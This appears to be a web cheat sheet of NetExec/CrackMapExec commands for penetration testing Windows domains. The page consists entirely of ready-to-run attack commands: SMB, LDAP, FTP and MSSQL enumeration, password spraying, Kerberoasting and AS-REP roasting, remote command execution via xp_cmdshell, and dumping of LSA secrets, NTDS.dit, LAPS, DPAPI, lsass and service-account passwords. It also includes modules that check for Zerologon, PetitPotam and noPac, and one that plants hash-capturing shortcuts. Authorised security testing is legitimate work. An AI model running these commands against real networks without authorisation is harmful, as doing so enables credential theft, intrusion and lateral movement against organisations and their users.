Skip to main content

New Page

A cheat sheet for NetExec and CrackMapExec, featuring useful commands and modules for different services to use during Pentesting

Enumeration

Initial Enumeration

netexec smb target

Null Authentication

netexec smb target -u '' -p ''

Guest Authentication

netexec smb target -u 'guest' -p ''

List Shares

netexec smb target -u '' -p '' --shares
netexec smb target -u username -p password --shares

List Usernames

netexec smb target -u '' -p '' --users
netexec smb target -u '' -p '' --rid-brute
netexec smb target -u username -p password --users

Local Authentication

netexec smb target -u username -p password --local-auth

Using Kerberos

netexec smb target -u username -p password -k

Check for hosts that have SMB signing disabled

netexec smb target(s) --gen-relay-list relay.txt

Spraying

Password Spray

netexec smb target -u users.txt -p password --continue-on-success
netexec smb target -u usernames.txt -p passwords.txt --no-bruteforce --continue-on-success
netexec ssh target -u username -p password --continue-on-success

SMB

All In One

netexec smb target -u username -p password --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol

Spider_plus Module

netexec smb target -u username -p password -M spider_plus
netexec smb target -u username -p password -M spider_plus -o READ_ONLY=false

Dump a specific file

netexec smb target -u username -p password -k --get-file target_file output_file --share sharename

FTP

List folders and files

netexec ftp target -u username -p password --ls

List files inside a folder

netexec ftp target -u username -p password --ls folder_name

Retrieve a specific file

netexec ftp target -u username -p password --ls folder_name --get file_name

LDAP

Enumerate users using ldap

netexec ldap target -u '' -p '' --users

All In One

netexec ldap target -u username -p password --trusted-for-delegation  --password-not-required --admin-count --users --groups

Kerberoast

netexec ldap target -u username -p password --kerberoasting kerb.txt

ASREProast

netexec ldap target -u username -p password --asreproast asrep.txt

MSSQL

Authentication

netexec mssql target -u username -p password

Execute commands using xp_cmdshell

-X for powershell and -x for cmd

netexec mssql target -u username -p password -x command_to_execute

Get a file

netexec mssql target -u username -p password --get-file output_file target_file

Secrets Dump

Dump LSA secrets

netexec smb target -u username -p password --local-auth --lsa

gMSA

netexec ldap target -u username -p password --gmsa-convert-id id
netexec ldap domain -u username -p password --gmsa-decrypt-lsa gmsa_account

Group Policy Preferences

netexec smb target -u username -p password -M gpp_password

Dump LAPS v1 and v2 password

netexec smb target -u username -p password --laps

Dump dpapi credentials

netexec smb target -u username -p password --laps --dpapi

Dump NTDS.dit

netexec smb target -u username -p password --ntds

Bloodhound

netexec ldap target -u username -p password --bloodhound -ns ip --collection All

Useful Modules

Webdav

Checks whether the WebClient service is running on the target

netexec smb ip -u username -p password -M webdav 

Veeam

Extracts credentials from local Veeam SQL Database

netexec smb target -u username -p password -M veeam

slinky

Creates windows shortcuts with the icon attribute containing a UNC path to the specified SMB server in all shares with write permissions

netexec smb ip -u username -p password -M slinky 

ntdsutil

Dump NTDS with ntdsutil

netexec smb ip -u username -p password -M ntdsutil 

ldap-checker

Checks whether LDAP signing and binding are required and/or enforced

cme ldap target -u username -p password -M ldap-checker

Check if the DC is vulnerable to zerologon, petitpotam, nopac

netexec smb target -u username -p password -M zerologon
netexec smb target -u username -p password -M petitpotam
netexec smb target -u username -p password -M nopac

Check the MachineAccountQuota

netexec ldap target -u username -p password -M maq

ADCS Enumeration

netexec ldap target -u username -p password -M adcs

Dump lsass

netexec smb target -u username -p password -M lsassy

Retrieve MSOL account password

netexec smb target -u username -p password -M msol